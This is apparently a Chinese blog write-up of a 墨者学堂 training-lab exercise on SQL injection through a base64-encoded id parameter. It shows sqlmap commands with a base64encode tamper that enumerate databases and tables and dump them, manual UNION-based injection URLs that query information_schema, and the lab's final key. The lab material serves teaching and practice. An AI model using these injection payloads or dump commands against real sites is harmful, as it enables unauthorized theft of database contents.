web训练sql注入中级练习-墨者学堂

sql注入实战mysql(进阶版)


看这个是base64编码

手工注入注入不出来。。。

使用sqlmap跑提示使用tamper插件(里面有一个base64encode.py)

python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py  --risk 3 --dbms=mysql

暴库

python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py  --risk 3 --dbms=mysql --dbs

出来两个库(information_schema 和 test)

暴表

python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py  --risk 3 --dbms=mysql --tables -D test

爆出data

暴列

python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py  --risk 3 --dbms=mysql --colunmns -T data -D test

爆出 id  main thekey

暴字段

python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py  --risk 3 --dbms=mysql --dump -C "id,main,thekey" -T data -D test

得出key

手工注入


MQo= 是1的base64编码

以下执行的时候都要base64编码,用火狐的hackbar

猜长度

http://219.153.49.228:46170/show.php?id=1 order 2

回显正常 说明长度为2

猜库名

http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,database()

猜出库名为test

猜表名

http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='test'

猜出表名为 data

猜列

http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()

猜出有 id,title,main,thekey

猜字段

http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,group_concat(id,'-',thekey) from data

得出key 1-mozhe1f0328cc6f2a60605567e65e5cd

你可能感兴趣的:(web训练sql注入中级练习-墨者学堂)